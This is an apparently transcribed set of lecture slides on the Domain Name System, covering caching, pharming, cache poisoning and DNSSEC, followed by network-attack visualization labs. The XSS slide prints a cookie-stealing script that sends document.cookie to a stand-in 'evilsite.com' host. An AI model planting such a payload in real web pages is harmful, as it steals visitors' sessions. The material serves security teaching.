computer networks: domain name system
DESCRIPTION
Computer Networks: Domain Name System. Domain Name System. The domain name system (DNS) is an application-layer protocol for mapping domain names to IP addresses. DNS. www.example.com. 208.77.188.166. http:// www.example.com. My Example Blog Spot. http://208.77.188.166. - PowerPoint PPT PresentationTRANSCRIPT
Computer Networks: Domain Name System
Domain Name System• The domain name system (DNS) is an application-layer
protocol for mapping domain names to IP addresses
VacationSavings
DNS
http://208.77.188.166
My Example Blog Spot
http://www.example.com
My Example Blog Spot
VacationSavings
www.example.com 208.77.188.166
Iterative Name Resolution
Local Name Server
ApplicationApplication ResolverResolver
cachecache
google.com
ResolverResolver
cachecache
.com
ResolverResolver
cachecache
query
answer
answer
query
. (root)
ResolverResolver
cachecache1
2
3
query
answer
Name Resolution• Resolution method when answer not in cache:
Where is www.example.com?
Where is www.example.com?
Try com nameserver
Where is www.example.com?
Try example.com nameserver
Where is www.example.com?
208.77.188.166
208.77.188.166
Client
ISP DNSServer
rootname server
comname server
example.comname server
DNS CachingStep 1: query yourdomain.org
Local Machine
ApplicationApplication ResolverResolver
cachecache
Local NS
ResolverResolver
cachecache
Authoritative Name Server
Step 2: receive reply and cache at local NS and host
Local Machine
ApplicationApplication ResolverResolver
cachecache
Local NS
ResolverResolver
cachecache
Authoritative Name Server
query query
answeranswer
DNS Caching (con'd)Step 3: use cached results rather than querying the ANS
Local Machine 1
ApplicationApplication ResolverResolver
cachecache
Local NS
ResolverResolver
cachecache
Local Machine 2
ApplicationApplication ResolverResolver
cachecache
Step 4: Evict cache entries upon ttl expiration
query
answer
Pharming: DNS Hijacking• Changing IP associated with a server
maliciously:
http://www.example.com
My Premium Blog Spot
userID:
password:
http://www.example.com
My Premium Blog Spot
www.example.com
Normal DNS
74.208.31.63
www.example.com
Pharmingattack
Phishing: the different web sites look the same.
userID:
password:
208.77.188.166
DNS Cache Poisoning
• Basic idea: give DNS servers false records and get it cached
• DNS uses a 16-bit request identifier to pair queries with answers
• Cache may be poisoned when a name server:– Disregards identifiers– Has predictable ids– Accepts unsolicited DNS records
DNS Cache Poisoning Prevention
• Use random identifiers for queries• Always check identifiers• Port randomization for DNS requests• Deploy DNSSEC
– Challenging because it is still being deployed and requires reciprocity
http://www.youtube.com/watch?v=1d1tUefYn4U http://williams.comp.ncat.edu/IA_visualization_labs/security_visual_tools/wireless_attacks/wireless_attacks_demo.html
DNSSEC• Guarantees:
– Authenticity of DNS answer origin– Integrity of reply– Authenticity of denial of existence
• Accomplishes this by signing DNS replies at each step of the way
• Uses public-key cryptography to sign responses• Typically use trust anchors, entries in the OS to
bootstrap the process
DNS Signing
DNSSEC Deployment• As the internet becomes regarded as critical
infrastructure there is a push to secure DNS• NIST is in the process of deploying it on root
servers now• May add considerable load to dns servers
with packet sizes considerably larger than 512 byte size of UDP packets
• There are political concerns with the US controlling the root level of DNS
13
Development steps
1. Work on the following lab first to understand DNS Pharming and cache poisoning attacks.
2. Learn basics in HTML53. Design scenarios of DNS attacks4. Implementation and user study
14
Experience DNS attacks
DNS Pharming attack from Kevin’s Du SEED labs in Syracuse University
http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_DNS/
15
HTML5
• The new standard for HTML• New Elements, New Attributes, Full CSS3 Support, Video
and Audio, 2D/3D Graphics, Local Storage, Local SQL Database, Web Applications• New features should be based on HTML, CSS, DOM, and
JavaScript• Reduce the need for external plugins (like Flash)• Better error handling• More markup to replace scripting• HTML5 should be device independent
• URL: http://www.w3schools.com/html/html5_intro.asp
04/19/2023 UTC/CSE 16
Interactive Security Visualization
04/19/2023 17
Network Security Visualization – Packet Sniffer
Packet sniffer is a program that captures all of the packets of data that pass through a given network interface, and recognizes and decodes certain packets of interest.
http://williams.comp.ncat.edu/IA_visualization_labs/security_visual_tools/packet_sniffer/packet_sniffer.html
04/19/2023 18
Network Security Visualization -- Wireless Network Attacks Simulator
EavesdroppingThe attacker configures his/her network interface into promiscuous mode, which allows a network device to read each network packet that arrives at the device.
Evil Twin An evil twin is a wireless access point (AP) that masquerades as a legitimate one.
Man in the MiddleThe attacker intercepts the traffic between two computers. The attacker sniffs packets from the network, may modify the packets and inserts them back into the network.
ARP Cache PoisoningAddress Resolution Protocol (ARP) is a network layer protocol used to associate an IP address with a MAC address. A network device has an ARP cache, which contains all the IP addresses and MAC addresses the device has already matched together.
http://williams.comp.ncat.edu/IA_visualization_labs/security_visual_tools/wireless_attacks/wireless_attacks.html
04/19/2023 19
Network Security Visualization -- SYN Flood
SYN Flood, one of Denial-of-Service attacks
http://williams.comp.ncat.edu/IA_visualization_labs/security_visual_tools/SYNFloodDemo/index.htm
04/19/2023 20
Network Security Visualization – Web Security
Cross site scripting: attacker injects scripting code into pages generated by a web applicationScript could be malicious codeJavaScript (AJAX!), VBScript, ActiveX, HTML, or Flash
Threats:Phishing, hijacking, changing of user settings, cookie
theft/poisoning, false advertising , execution of code on the client, ...
XSS ExampleWebsite allows posting of comments in a guestbook
Server incorporates comments into page returned
<html>
<body>
<title>My Guestbook!</title>
Thanks for signing my guestbook!<br />
Here's what everyone else had to say:<br />
Joe: Hi! <br />
John: Hello, how are you? <br />
Jane: How does this guestbook work? <br />
</body>
Comment that includes malicious JavaScript
Evilguy: <script>
document.location = "http://www.evilsite.com/steal.php?cookie="+document.cookie;
</script>
04/19/2023 21
guestbook.html
<html><title>Sign My Guestbook!</title><body>Sign my guestbook!<form action="sign.php"
method="POST"><input type="text" name="name"><input type="text" name="message"
size="40"><input type="submit" value="Submit"></form></body></html>
If the sign.php copies whatever the user types in the post form into the content of the guest book, the feedback will be sent to other users.
Redirect visitor to the attacker’s site and concatenate the user’s cookies to the URL as a GET parameter for the steal.php page.
04/19/2023 22
Animation of XSS
http://a4apphack.com/security/xss-made-simple-flash-animation
http://m6gatlinburg.com/tmp/xss/xss.html (under development)